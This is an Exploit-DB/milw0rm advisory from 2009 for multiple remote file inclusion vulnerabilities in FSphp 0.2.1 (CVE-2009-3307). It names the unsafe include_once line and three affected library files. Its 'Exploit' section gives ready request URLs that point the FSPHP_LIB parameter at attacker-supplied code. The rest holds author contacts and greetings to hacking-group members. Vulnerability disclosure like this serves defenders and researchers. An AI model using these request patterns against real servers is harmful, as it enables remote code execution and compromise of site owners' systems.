FSphp 0.2.1 - Multiple Remote File Inclusion Vulnerabilities

2009-09-18T00:00:00
ID EDB-ID:9720
Type exploitdb
Reporter NoGe
Modified 2009-09-18T00:00:00

Description

FSphp 0.2.1 Multiple Remote File Inclusion Vulnerabilities. CVE-2009-3307. Webapps exploits for multiple platform

                                        
                                            ==============================================================================


  [o] FSphp 0.2.1 Multiple Remote File Inclusion Vulnerabilities

       Software : FSphp version 0.2.1
       Vendor   : http://fsphp.sourceforge.net/
       Download : http://sourceforge.net/projects/fsphp/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


==============================================================================


  [o] Vulnerable file

       include_once $FSPHP_LIB . "/path.php" ;

	 lib/FSphp.php
	 lib/navigation.php
	 lib/pathwirte.php


  [o] Exploit

       http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de]
       http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de]
       http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de]


==============================================================================


  [o] Greetz

       Anti Security [ http://antisecurity.org ]
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe
       H312Y yooogy mousekill }^-^{ martfella noname s4va
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


  [o] Note

       SELAMAT HARI RAYA IDUL FITRI
       MOHON MAAF LAHIR BATIN


==============================================================================

# milw0rm.com [2009-09-18]